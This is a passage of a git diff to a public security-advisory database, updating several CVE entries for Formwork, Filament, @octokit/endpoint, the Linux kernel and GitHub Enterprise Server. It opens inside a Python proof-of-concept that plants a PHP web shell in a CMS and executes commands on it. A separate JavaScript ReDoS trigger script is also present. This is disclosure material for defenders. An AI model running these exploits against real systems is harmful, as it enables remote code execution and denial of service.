f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -49,9 +54,9 @@ "CWE-287", "CWE-434" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T16:58:33Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:21Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json index 29d2d42046096..6575c789053ec 100644 --- a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json +++ b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5pxr-7m4j-jjc6", - "modified": "2025-03-19T14:49:46Z", + "modified": "2026-02-18T23:46:36Z", "published": "2024-06-07T19:37:10Z", "aliases": [ "CVE-2024-37160" ], "summary": "Cross-site scripting (XSS) vulnerability in Description metadata", - "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).\n\n### PoC\n1. Log in with an Administrator user account.\n2. Navigate to /panel/options/site/.\n3. Inject the JS script by adding to the description field.\n4. Simulate a victim who is not a site member visiting the website. You will notice that the JS script executes on every page they vis\n\n![image](https://github.com/getformwork/formwork/assets/170840940/1c40be24-3367-4c80-bb44-9db64ef88970)\n![image](https://github.com/getformwork/formwork/assets/170840940/68dd5bff-9db1-441b-a3b3-a0c014565f59)\n![image](https://github.com/getformwork/formwork/assets/170840940/3cd84c39-9b44-49d0-8b6a-6c8aeda7e49f)\n![image](https://github.com/getformwork/formwork/assets/170840940/f45afd87-80e9-4cf1-8121-bb4e121849c9)", + "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json b/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json index e74db3d61a505..2ddc41e7c50d2 100644 --- a/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json +++ b/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-x4gp-pqpj-f43q", - "modified": "2025-07-28T15:46:43Z", + "modified": "2026-02-17T19:30:26Z", "published": "2024-06-18T21:56:24Z", "aliases": [ "CVE-2024-58262" ], "summary": "curve25519-dalek has timing variability in `curve25519-dalek`'s `Scalar29::sub`/`Scalar52::sub`", "details": "Timing variability of any kind is problematic when working with potentially secret values such as elliptic curve scalars, and such issues can potentially leak private keys and other secrets. Such a problem was recently discovered in `curve25519-dalek`.\n\nThe `Scalar29::sub` (32-bit) and `Scalar52::sub` (64-bit) functions contained usage of a mask value inside a loop where LLVM saw an opportunity to insert a branch instruction (`jns` on x86) to conditionally bypass this code section when the mask value is set to zero as can be seen in godbolt:\n\n- 32-bit (see L106): https://godbolt.org/z/zvaWxzvqv\n- 64-bit (see L48): https://godbolt.org/z/PczYj7Pda\n\nA similar problem was recently discovered in the Kyber reference implementation:\n\nhttps://groups.google.com/a/list.nist.gov/g/pqc-forum/c/hqbtIGFKIpU/m/cnE3pbueBgAJ\n\nAs discussed on that thread, one portable solution, which is also used in this PR, is to introduce a volatile read as an optimization barrier, which prevents the compiler from optimizing it away.\n\nThe fix can be validated in godbolt here:\n\n- 32-bit: https://godbolt.org/z/jc9j7eb8E\n- 64-bit: https://godbolt.org/z/x8d46Yfah\n\nThe problem was discovered and the solution independently verified by Alexander Wagner and Lea Themint using their DATA tool:\n\nhttps://github.com/Fraunhofer-AISEC/DATA", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [ { "package": { @@ -56,7 +61,7 @@ "cwe_ids": [ "CWE-203" ], - "severity": "MODERATE", + "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2024-06-18T21:56:24Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json b/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json index 017745cd2c54d..39731d5869690 100644 --- a/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json +++ b/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-9h9q-qhxg-89xr", - "modified": "2024-10-23T17:40:43Z", + "modified": "2026-02-17T19:41:13Z", "published": "2024-09-27T20:51:01Z", "aliases": [ "CVE-2024-47186" ], "summary": "Filament has unvalidated ColorColumn and ColorEntry values that can be used for Cross-site Scripting", "details": "### Summary\n\nIf values passed to a `ColorColumn` or `ColumnEntry` are not valid and contain a specific set of characters, applications are vulnerable to XSS attack against a user who opens a page on which a color column or entry is rendered.\n\nVersions of Filament from v3.0.0 through v3.2.114 are affected.\n\nPlease upgrade to Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115).\n\n### PoC\n\nFor example, using a value such as:\n\n```html\nblue;\"> $state,\n])>\n```\n\nSince Laravel does not escape special characters within the `@style` Blade directive, the effective output HTML would be:\n\n```html\n
\n```\n\nCreating the opportunity for arbitrary JS to run if it was stored in the database.\n\n### Response\n\nThis vulnerability (in `ColorColumn` only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.\n\nThe review process concluded on 27/09/2024, which revealed the issue was also present in `ColorEntry`. This was fixed the same day and Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115) followed to escape any special characters while outputting inline styles like this:\n\n```blade\n
$state,\n])>
\n```\n\nAlthough these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the `ColorPicker` form component, [additional color validation documentation was published](https://filamentphp.com/docs/3.x/forms/fields/color-picker#color-picker-validation).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [ { "package": { @@ -71,7 +76,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "CRITICAL", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-09-27T20:51:01Z", "nvd_published_at": "2024-09-27T21:15:03Z" diff --git a/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json b/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json index 280d5caae63c8..ae9c28bfdeebc 100644 --- a/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json +++ b/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-76p7-773f-r4q5", - "modified": "2026-01-29T12:30:25Z", + "modified": "2026-02-17T03:30:15Z", "published": "2025-02-10T18:30:47Z", "aliases": [ "CVE-2024-11831" @@ -64,6 +64,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-11831" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2769" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:1536" diff --git a/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json b/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json index b83b5f4fb7e45..113ac1a613404 100644 --- a/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json +++ b/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-x4c5-c7rf-jjgv", - "modified": "2025-02-14T22:19:51Z", + "modified": "2026-02-17T16:11:00Z", "published": "2025-02-14T17:56:18Z", "aliases": [ "CVE-2025-25285" ], "summary": "@octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking", - "details": "### Summary\nBy crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.\n\n### Details\nThe issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:\n```ts\nheaders.accept.match(/[\\w-]+(?=-preview)/g) || ([] as string[]);\n```\nThe regular expression `/[\\w-]+(?=-preview)/g` encounters a backtracking issue when it processes `a large number of characters` followed by the `-` symbol.\ne.g., the attack string: \n```js\n\"\" + \"A\".repeat(100000) + \"-\"\n```\n\n### PoC\n[The gist](https://gist.github.com/ShiyuBanzhou/a17202ac1ad403a80ca302466d5e56c4)\nHere is the reproduction process for the vulnerability:\n1. run 'npm i @octokit/endpoint'\n2. Move `poc.js` to the root directory of the same level as `README.md`\n3. run 'node poc.js'\nresult:\n4. then the program will stuck forever with high CPU usage\n```js\nimport { endpoint } from \"@octokit/endpoint\";\n// import { parse } from \"./node_modules/@octokit/endpoint/dist-src/parse.js\";\nconst options = { \n method: \"POST\",\n url: \"/graphql\", // Ensure that the URL ends with \"/graphql\"\n headers: {\n accept: \"\" + \"A\".repeat(100000) + \"-\", // Pass in the attack string\n \"content-type\": \"text/plain\",\n },\n mediaType: {\n previews: [\"test-preview\"], // Ensure that mediaType.previews exists and has values\n format: \"raw\", // Optional media format\n },\n baseUrl: \"https://api.github.com\",\n};\n\nconst startTime = performance.now();\nendpoint.parse(options);\nconst endTime = performance.now();\nconst duration = endTime - startTime;\nconsole.log(`Endpoint execution time: ${duration} ms`);\n```\n1. **Import the `endpoint` module**: First, import the `endpoint` module from the npm package `@octokit/endpoint`, which is used for handling GitHub API requests.\n\n2. **Construct the `options` object that triggers a ReDoS attack**: The following member variables are critical in constructing the `options` object:\n- `url`: Set to `\"/graphql\"`, ensuring the URL ends with `/graphql` to match the format for GitHub's GraphQL API.\n- `headers`:\n> `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n> \n- `mediaType`:\n>`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n>\n>`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\"2\"\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint package`, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(? `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n> \n- `mediaType`:\n>`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n>\n>`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\"2\"\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint` package, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(?\") into the Role=User parameter in the /panel/users/{name}/profile page, which is the user profile update page.\nDoing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\n\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.\n\n### PoC\n\n![2025-02-27_10-25](https://github.com/user-attachments/assets/4b5a2d71-3397-4a5b-8464-35752376115a)\n\n1. Intercept the request and inject an input that will trigger an error.\n\n![2025-02-27_10-25_1](https://github.com/user-attachments/assets/a888c109-a724-4478-ae80-d9e8b05ef1aa)\n\n![image](https://github.com/user-attachments/assets/e81bb9fc-8c92-413c-8cc0-0bcffd2e2922)\n\n2.After that, it will be observed that the system is shut down or completely broken. Even changing the browser or resetting the server will not be able to restore it.", + "details": "### Summary\nImproper validation of select fields allows attackers to craft an input that crashes the system, resulting in a 500 status and making the entire site and administration panel unavailable.\nThis clearly impacts the Availability aspect of the CIA triad (confidentiality, integrity, and availability), although the attack still has certain limitations.\n\n### Details\nThe attack involves injecting any invalid user role value. Doing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json index b09f8f6bf94da..e0a593b17c8f7 100644 --- a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json +++ b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-vf6x-59hh-332f", - "modified": "2025-03-17T20:27:03Z", + "modified": "2026-02-18T23:47:22Z", "published": "2025-03-01T00:11:46Z", "aliases": [], "summary": " Formwork has a cross-site scripting (XSS) vulnerability in Site title", - "details": "### Summary\n\nThe site title field at /panel/options/site/allows embedding JS tags, which can be used to attack all members of the system. This is a widespread attack and can cause significant damage if there is a considerable number of users.\n\n### Impact\n\nThe attack is widespread, leveraging what XSS can do. This will undoubtedly impact system availability.\n\n### Patches\n- [**Formwork 2.x** (aa3e9c6)](https://github.com/getformwork/formwork/commit/aa3e9c684035d9e8495169fde7c57d97faa3f9a2) escapes site title from panel header navigation.\n\n### Details\n\nBy embedding \" Out of bounds access.\n\nAs T1 has not scheduled after T0 set the TRANSIT bit, it exits with the\nTRANSIT bit set. sched_mm_cid_remove_user() clears the TRANSIT bit in\nthe task and drops the CID, but it does not touch the per CPU storage.\nThat's functionally correct because a CID is only owned by the CPU when\nthe ONCPU bit is set, which is mutually exclusive with the TRANSIT flag.\n\nNow sched_mm_cid_exit() assumes that the CID is CPU owned because the\nprior mode was per CPU. It invokes mm_drop_cid_on_cpu() which clears the\nnot set ONCPU bit and then invokes clear_bit() with an insanely large\nbit number because TRANSIT is set (bit 29).\n\nPrevent that by actually validating that the CID is CPU owned in\nmm_drop_cid_on_cpu().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23225" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/81f29975631db8a78651b3140ecd0f88ffafc476" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json new file mode 100644 index 0000000000000..99f0b7c0423c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p546-7whm-cxpm", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-0573" + ], + "details": "An URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0573" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.22" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.17" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.13" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.10" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.4" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p56f-rc6p-7g84/GHSA-p56f-rc6p-7g84.json b/advisories/unreviewed/2026/02/GHSA-p56f-rc6p-7g84/GHSA-p56f-rc6p-7g84.json new file mode 100644 index 0000000000000..278f4c3951879 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p56f-rc6p-7g84/GHSA-p56f-rc6p-7g84.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p56f-rc6p-7g84", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-27573" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27573" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json new file mode 100644 index 0000000000000..0a3cb7dbead1e --- /dev/null +++ 